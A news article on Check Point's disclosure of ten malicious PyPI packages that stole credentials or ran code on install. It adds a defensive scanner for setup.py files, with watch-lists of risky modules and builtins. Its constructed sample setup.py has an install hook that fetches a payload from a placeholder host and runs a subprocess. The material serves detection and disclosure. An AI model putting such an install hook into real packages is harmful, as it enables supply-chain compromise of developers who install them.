Security researchers from Check Point have spotted 10 malicious packages on the Python Package Index (PyPI), the primary package repository used by Python developers.
The first of them was Ascii2text, a malicious package that mimicked the popular art package by name and description.
“Interestingly, [threat actors] were smart enough to copy the entire project description without the release part, preventing users from realizing this is a fake package,” Check Point wrote.
Ascii2text would work by downloading a script that gathered passwords stored in web browsers like Google Chrome, Microsoft Edge, Brave, Opera and Yandex Browser.
In its advisory, Check Point also mentioned Pyg-utils, Pymocks and PyProto2, three separate packages with the common goal of stealing users’ AWS credentials.
The Test-async and Zlibsrc libraries also appear in the report. According to Check Point, both of them would download and execute potentially malicious code during installation.
An additional trio of malicious packages is mentioned by Check Point: Free-net-vpn, Free-net-vpn2 and WINRPCexploit – all of which are capable of stealing user credentials and environment variables.
Finally, the advisory mentions Browserdiv, a malicious package whose aim was to steal installers’ credentials by collecting and sending them to a predefined Discord webhook.
“Interestingly, while according to its naming it seems to target web design-related programming (browser, div), according to its description the package motivation is to enable the use of selfbots inside Discord,” Check Point wrote.
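Two of the behaviours described above, running code during installation (Test-async, Zlibsrc) and cloning a legitimate project's description (Ascii2text), can be screened for before a package is installed. The following is an added example written for this article, not Check Point's tooling or code from any of the packages named; the setup.py it scans is a constructed sample, and the module and builtin lists are assumptions about what a reviewer would treat as suspicious.

```python
import ast
from difflib import SequenceMatcher

# Assumed watch-lists: modules and builtins whose use in setup.py signal install-time execution.
RISKY_MODULES = {"subprocess", "os", "urllib", "requests", "socket", "base64"}
RISKY_BUILTINS = {"exec", "eval", "compile", "__import__"}

def inspect_setup(source: str) -> dict:
    """Statically scan a setup.py for risky imports/calls and custom install commands."""
    findings = {"imports": set(), "calls": set(), "cmdclass": False}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            for n in names:
                if n.split(".")[0] in RISKY_MODULES:
                    findings["imports"].add(n.split(".")[0])
        elif isinstance(node, ast.Call):
            f = node.func
            if isinstance(f, ast.Name) and f.id in RISKY_BUILTINS:
                findings["calls"].add(f.id)
            elif isinstance(f, ast.Attribute):
                # Unwind dotted calls such as subprocess.run or urllib.request.urlopen.
                parts = []
                while isinstance(f, ast.Attribute):
                    parts.append(f.attr)
                    f = f.value
                if isinstance(f, ast.Name) and f.id in RISKY_MODULES:
                    findings["calls"].add(".".join([f.id] + parts[::-1]))
        elif isinstance(node, ast.keyword) and node.arg == "cmdclass":
            # A cmdclass override is what lets a package run its own code during `pip install`.
            findings["cmdclass"] = True
    return findings

def description_similarity(a: str, b: str) -> float:
    """Ratio in [0, 1]; a value at or near 1.0 means one description is a copy of the other."""
    return SequenceMatcher(None, a, b).ratio()

# Constructed sample: a setup.py that installs a custom install hook which reaches out to the network.
SAMPLE_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import subprocess, urllib.request
class Hook(install):
    def run(self):
        install.run(self)
        urllib.request.urlopen("https://example.invalid/payload")
        subprocess.run(["echo", "hooked"])
setup(name="demo", version="0.1", cmdclass={"install": Hook})
'''
```

Running `inspect_setup(SAMPLE_SETUP)` reports the `cmdclass` override together with the `urllib.request.urlopen` and `subprocess.run` calls, and `description_similarity` can be run against the description of the legitimate project a candidate package resembles.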
Once the security researchers identified these malicious users and packages, they reportedly alerted PyPI via their official website.
“Following our disclosure, PyPI removed these packages,” the advisory concluded.
Unfortunately, this is not the first time that malicious open-source packages have been spotted on the PyPI repository. In November 2021, the JFrog Security research team revealed it had discovered 11 new malware packages with over 40,000 downloads from PyPI.
To reduce the presence of malicious packages on PyPI, the repository’s team started enforcing a two-factor authentication (2FA) policy for projects categorized as “critical” in July.